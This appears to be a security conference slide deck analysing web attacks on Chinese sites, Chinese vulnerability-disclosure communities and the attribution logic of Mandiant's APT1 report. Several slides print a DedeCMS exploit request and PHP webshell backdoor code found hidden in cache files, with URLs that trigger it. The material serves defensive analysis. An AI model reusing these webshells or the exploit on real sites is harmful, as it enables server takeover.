{Anthony LAI, Zetta KE}, Researcher [en] China is a victim, too :-) アンソニー・ライ、ゼッタ KE 中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか？」という視点で、どのような攻撃をうけ、どんな理由があるのか？をお見せしよう。 さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。 また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。 もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。 China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture. Of course, we got a hidden agenda as well. It would be a fun session and let us enjoy it..

1. China is a victim, too :)
(AVTokyo Special Edition)
Darkfloyd x Zetta, VXRL

2. 免責条項
我々は、
中国や香港の政府で
働いているわけではなく、
支援やお金ももらってません。

3. 目的
●
いつも中国は積極的な攻撃者側であるとされて
いるが、解析を通じて別の側面が見えてきた :
−
Part1: 中国の様々な Web サイトに対する攻撃を解
析したある一日
−
Part2: 中国ではソフトやサイトの脆弱性はどのよう
に公開されているか知っていますか？
●
−
報道はいつも中国のブラックハット側ばかりを扱うが、
ホワイトハットはどうなってるの？
Part3:APT1 レポートへの反論 (Ran2 より )

4. Part 1: 中国の様々な Web サイトに対する
攻撃を解析したある一日

5. 研究と解析
●
●
●
北京の Knownsec のクラウドベースのアプリケ
ーション FW からキャプチャした攻撃のログ /
データと VXRL で解析をした結果を共有してい
る。
我々は 11 月 11 日を解析した。この日は中国本
土でオンラインショッピング / 電子商取引の割
引が行われる日 (Single's Day, 光棍節 ) 。
我々は攻撃の重要度やインパクトを考慮して被
害者の IP やドメイン名は公開しない。

6. Single's Day, 光棍節とは ?

7. Single's Day, 光棍節とは ?

8. Single’s Day は
米国でいえばサイバーマンデー
http://en.wikipedia.org/wiki/Singles_Day

9. 研究と解析
●
我々は何を観察して解析をしたいのか？
−
割合分布：海外からの攻撃 vs 国内からの攻撃
−
主な被害者はどんな攻撃を受けている？
−
優秀な攻撃者？ どんな攻撃手法を好む？
−
どんなシステムやプラットフォームがターゲットに
なっている？
−
その他興味深い攻撃ペイロードは？

10. 11/11 の攻撃トラフィック vs ペイロー
ド
攻撃トラフィック（ 1 分ごとの合計）

11. 11/11 の攻撃トラフィック vs ペイロー
ド:
夕方から夜
攻撃トラフィック（ 1 分ごとの合計、スキャナーのトラフィックを除外）

12. 攻撃タイプの分布
Attack Type
SCANNER
No. of Request
Percentage
59101248
91.3447%
LRFI
218753
0.3381%
FILEI
222774
0.3443%
SPECIAL
35838
0.0554%
WEBSHELL
42463
0.0656%
4491625
6.9421%
SQLI
274792
0.4247%
XSS
225796
0.3490%
1022
0.0016%
86140
0.1331%
887
0.0014%
64701338
100.00%
COLLECTOR
OS_COMMAND
CODE
OTHERS

13. 電子ショッピングの日 (2013/11/11)
の攻撃者はどこにいる？
解析結果から 97.5 % は「中国国内の IP から」
残り 2.5% は海外から
それらにはスキャナーも含む

14. スキャナーからの攻撃を除いたら
どうでしょうか？
Country Attack
China 1070489
US 18588
Netherlands
5404
Hong Kong
4288
Korea
1823
Turkey
1429
Japan
872

15. 攻撃者トップ 25
24 位はアメリ
カ
それ以外は
すべて中国

16. ケーススタディ：
中国は被害者であるかないか？！

17. “ いい人ランキング”への投票
Tou.php – “Tou” は “投票” , 中国語で “投”
このサイトへのリクエストデータは 6.5GB にもなる。
事実、我々中国人は「良い行いと、善良な人」に対してポジテ
ィブにサポートをする
ただ、実際の投票とロボットによる投票の区別は難しい

18. 我々は、香港から攻撃トラフィック
を発見した
Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X

19. それは私が好きな ISP だった :)

20. 11/11 のショッピングの日 (Single’s
Day) ！
「グループ購入のサイト」へ 47 回の古い OS コ
マンドの攻撃通信を見つけた

21. 海外からの攻撃はどうだろう？
どこから？
Country
China
US
Korea
Hong Kong
Thailand
Taiwan
Japan
IP
116.252.224.162
173.208.240.190
119.70.29.137
58.64.205.27
110.34.230.226
118.233.66.105
202.89.232.79

22. 観察：海外からの
興味深い攻撃はあるか？
アメリカから？！
中国の Python レイヤー 7 の DDos スクリプ
ト？！（ 0:00-2359 ）

23. 観察：中国のツールが
アメリカの IP アドレスから :)
http://www.dklkt.cn/article.asp?id=233

24. アメリカからの攻撃はあるか？

25. アメリカからの攻撃はあるか？
•
•
•
最近は CMS の脆弱性に関するスキャンと探索
詳細はのちほど紹介
CMS とフォーラムが標的

26. 日本からの攻撃はあるか？

27. 日本からの攻撃はあるか？
特別なものはない、単純なダウンロード、スキャ
ナーからの通信
興味深いのは中国のスキャンサービス
webscan.360.cn は日本の IP アドレスを使用して
いる。

28. 韓国からの攻撃はあるか？
こちらも特別なものはない、
単純なダウンロード、スキャナーからの通信
315online.com.cn は
アンチオンライン詐欺のポータルサイト

29. 台湾やタイからの攻撃はあるか？
典型的なスキャナーの通信、特別なものは無い

30. オランダからの攻撃はあるか？
中国の Wordpress に似たサイトへのスキャン

31. 観察：被害者送られた特別なペイロード
●
●
●
<URL>/plus/download.php?open=1&arrs1%5B
%5D=99&arrs1%5B%5D=102&arrs1%5B
%5D=103&arrs1%5B%5D=95&arrs1%5B
%5D=100&arrs1%5B%5D=98&arrs1%5B
%5D=112&arrs1%5B%5D=114&arrs1%5B
%5D=101&arrs1%5B%5D=102&arrs1%5B
%5D=105&arrs1%5B%5D=120&arrs2%5B
%5D=109&arrs2%5B%5D=121&arrs2%5B
Dedecms に Webshell バックドアを作成
Dedecms の脆弱性を使って多くの攻撃を受けている
http://www.wooyun.org/searchbug.php?q=dedecms

32. Dedecms ( 中国製 CMS)

34. DedeCMS

35. 参考 : DedeCMS Exploit
Interesting technique to hid the webshell: put it like a cache file.
http://www.nxadmin.com/penetration/1168.html
http://blog.csdn.net/seoyundu/article/details/12855759
/plus/download.php exploit - Inject Webshell
http://www.xiaosedi.com/post/dedecms_exp_01.html
/plus/search.php exploit - Inject Webshell
http://eoo.hk/oswork/28.htm
DedeCMS backdoor killer from Anquan.org
http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895

36. ログに 90sec.php を見つけて、 .inc ファイルに以下のステートメントがあっ
た:
{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);
{/dede:php}
でも、そんなフォルダーは見つからない
なぜ？
data/cache フォルダー配下に、以下のコードを含む複数の htm (myad1.htm,myad-16.htm,mytag-1208.htm) ファイルが見つかった :
<!–
document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);
–>
<!–
document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?
>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–>
<!–
document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/
[copyright]/e’,$_REQUEST['guige'],’error’);?>”);
–>

37. おかしい、 .htm ページが webshell として機能している。
そして .htm ファイルが他の php ファイルを include している。
チェックをしたら /mytag_js.php が追加されていた

38. スキャナーに検出されることなく、様々な ID を渡
しながら、以下の URL で webshell バックドアをト
リガーする :
http://www.nxadmin.com/plus/mytag_js.php?id=1208
http://www.nxadmin.com/plus/ad_js.php?id=1
参考 :http://www.nxadmin.com/penetration/1168.html

39. Part 2: 中国のホワイトハット組織

40. 中国のホワイトハット
Wooyun: 中国でバグを公表
●
コンセプトは Miter の CVE に似てるが、
より有益で組織化されている
●
ベンダーに対して中立
●
一般に公開している
●
ホワイトハットコミュニティを支援している (
http://www.wooyun.org/whitehats/)

41. 観察 #1:
CMS のバグはいたるところにある
( 以下はグーグル翻訳結果、実際は中国語 )
http://www.wooyun.org/bug.php?action=list&subtype=52

42. 観察 #2:
ホワイトハットが脆弱性を報告しても…
●
●
ホワイトハットが 360 に対して高リスクの脆弱性を報
告したが、 360 は「無視する ! 」と言った
ファック！（ -_- ）凸

45. かたくなに無視されている
高～中レベルの脆弱性 ( 黄色で強
調)
http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360

46. 観察 #3: ベンダーからの報奨金と
ホワイトハットの促進

47. Zoomeye (www.zoomeye.org)

48. 中国のホワイトハット : Anquan.org
( 様々なソフトウェアやセキュリティ製
品ベンダーの間でのセキュア同盟 )
●
800 のベンダー
●
ベンダーに対して中立
●
どんな違反行為、プライバシー侵害、フィッシ
ングアタック等に対しても報告できる公共のプ
ラットフォーム
●
http://www.anquan.org/help/aboutus/authen/

49. まだ時間があるなら、、、
Part 3: APT1 レポート - VXRL の Ran2 からの反論

50. APT1 レポート : 反論
●
●
●
Mandiant の APT1 レポートを読んだ人いる？
VXRL の研究者、 Ran2 がレポートを分析し
た。
Mandiant は、中国人民解放軍 61389 部隊から
米国への攻撃があったと推測 :
−
攻撃者のパスワード
−
フォーラムの投稿
から攻撃者をプロファイリング

51. Mandiant の APT1 レポート
●
●
●
2013 年 2 月 18 日に、 Mandiant は前例のない
報告書を発表した。
"APT1: 中国のサイバースパイユニットの一つ
に関する暴露 "
Mandiant は、人民解放軍（ PLA ）の 61398 部
隊と、 APT 攻撃グループ APT1 （別名コメン
トクルー）とを結ぶ証拠を発見したと主張

52. Mandiant の APT1 レポート
●
●
●
中国当局は、 Mandiant が非難している APT の
活動へのつながりを全面的に否定している。
数名の論評家曰く： "Mandiant は明らかに
Beijing （北京）の犯行現場を抑えている "
しかし、懐疑論者曰く： "Mandiant によって証
拠が中国または PLA に向けられるようにでっ
ち上げられている。結論に説得力のあるハッキ
ングの証拠が含まれていなかった "

53. 事実の解明 #1:
攻撃者のプロファイリング
●
「 APT1 はデジタルマシンの中の幽霊ではな
い」と Mandinat は主張する。 Mandinat は
APT1 のペルソナの数を特定した。 APT1 レポ
ートの 51 ページでは、 APT1 のペルソナを特
定したデータマイニングによるプロファイリン
グの方法についてのヒントが示されている。
−
APT1 のデジタル兵器の作者 ( つまり、マルウェアの作者 )
−
APT1 の FQDN の登録者 ( 別名 FQDN プロファイリング )
−
電子メールアカウント ( ソーシャルウェブサイトで使われた )
−
漏洩した Rootkit.com アカウントの登録記録

54. 事実の解明 #1:
攻撃者のプロファイリング
●
●
プロファイリングの結果に基づき、上海を拠点
にし、マルウェアの作者と連絡を取る義務があ
り、 APT1 攻撃の準備および実行した 3 つのペ
ルソナは PLA のために働いていると Mandiant
はと信じていた。
UglyGorilla （ UG ）は、上記の結論につながる
特定された主要なペルソナである。

55. 事実の解明 #1:
攻撃者のプロファイリング
●
さらにインターネット上で検索し、私もまた中
国の軍事フォーラムで Jack Wang の投稿を発
見した。 UglyGorilla もしくは Jack Wang が、
実際に 15 のメッセージを投稿したことを私は
発見したが、サイバー戦争に関連する投稿はた
ったの 2 つしかなかった。その他のトピックは
通常の戦争やバイオ化学兵器の話題であった。
彼は軍事戦争の愛好家としてフォーラムに投稿
していたが、彼自身が兵士であると言及してい
なかった。私はこの情報も APT1 レポートの中
で開示されるべきだと思う。

57. 事実の解明 #1:
攻撃者のプロファイリング
●
UglyGorilla が APT1 マルウェアの作成者である
Jack Wang または Wang Dong であることを証
明する高い可能性を持っているにもかかわら
ず、私は彼が中国兵または PLA の 61398 部隊
にサービスを提供している証拠を見つけていま
せん。私は見つけることができる唯一のつなが
りは中国の軍事フォーラムでの彼の投稿です
が、自分がただの軍事愛好家と述べただけだっ
た。

58. 事実の解明 #1:
攻撃者のプロファイリング
●
UglyGorilla と同様に、 APT1 レポートに記さ
れたもう一つのペルソナ、 DOTA を特定しま
した。キャプチャされたビデオより、 DOTA は
メールアカウントを登録するため一度だけ使用
され、監視対象の踏み台への RDP 接続によっ
て得た情報だと私は考えています。

59. 事実の解明 #1:
攻撃者のプロファイリング
●
●
DOTA は上海の電話を使用していたし、他の関
係者と通信するとき、彼は英語に堪能であるこ
とが明確に証明されている。私は、 DOTA が
「 2j3c1k 」（二局三处一科）総参謀部第三部
第二局を意味するパスワードを使用していると
信じている。
しかし、我々は、他に（二鸡三吃一刻）「 3 種
類の方法で 2 羽の鶏を調理した瞬間」の意味で
もあることを否定できない。

60. 事実の解明 #1:
攻撃者のプロファイリング
●
はい、それは興味深いですね。中国語を簡単な
文字で表す方法はたくさんあります。
●
私は告発するための出口を探そうとしている訳
ではありませんが、 APT1 が PLA の 61398 部
隊であることを指し示す確固たる証拠を見た
い。

61. 事実の解明 ＃ 2 ：インフラ、
リモートデスクトップセッション
●
Mandiant は 4 ページで、 1905 のうち 1849 セ
ッションで「中国語（簡体字） - 米国のキーボ
ード」キーボードレイアウトを使用したと付言
している。また、彼らは攻撃者が Microsoft の
OS の中国語版を使用したと考えている。攻撃
者が Microsoft の OS の中国語版を使用してい
るという理由で、 Mandiant は APT1 は中国本
土にいる人間であると考えている。

62. 事実の解明 ＃ 2 ：インフラ、
リモートデスクトップセッション
●
RDP クライアントは RDP サーバ（ここでは、
被害者または踏み台）に 4 バイトのキーボード
のレイアウトを送信することが、マイクロソフ
トの RDP プロトコル文書から分かった。 RDP
サーバにネットワークスニファをインストール
することで、デジタルな証拠を得ることができ
ます。攻撃者が「中国語（簡体字） - US キー
ボード」を使用した場合、受信者側では、ネッ
トワークパケットから 0x0804 という 4 バイト
の証拠の検出ができます。

64. APT1 レポートへの反論の
さらなる詳細は
−
http://espionageware.blogspot.hk/

65. まとめ
●
●
●
●
●
中国のサイトへ対する興味深いペイロードと実
践を紹介しました
11 月 11 日の海外から中国への Web 攻撃 ( 電子
商取引サイトへの大量のアクセス ) は、少数派
によって行われていました。
クローラーとスキャナーがトラフィックの大多
数を占め、それ以外の大半は SQL インジェク
ションです。
中国では CMS システムへの攻撃が多発してい
る。
中国にはセキュリティコミュニティを支援する

66. まとめ
●
●
我々は、技術的なより合理的な推論、十分な証
明、科学的解析を元にした技術レポートを期待
します。
中国を単純にサイバー戦争の当事者と関連付け
ることの無い中立的な立場の分析レポートを望
んでいます。
●
中国のセキュリティに対する、より公平なコメ
ントを望んでいます。
●
誤った恐怖感を植えつけることで、製品やソリ
ューションを売りつけることは簡単です。しか
し、研究者として高い倫理観と確かな思考を備
えておいてください。私たちは研究者であり科

67. 感謝 Thank you so much :)
Zetta と Ran2 の
仕事、分析、時間に尊敬と感謝
Knownsec の研究目的の攻撃ログの共有に
深い感謝
darkfloyd@vxrl.org
ozetta@vxrl.org
ran2@vxrl.org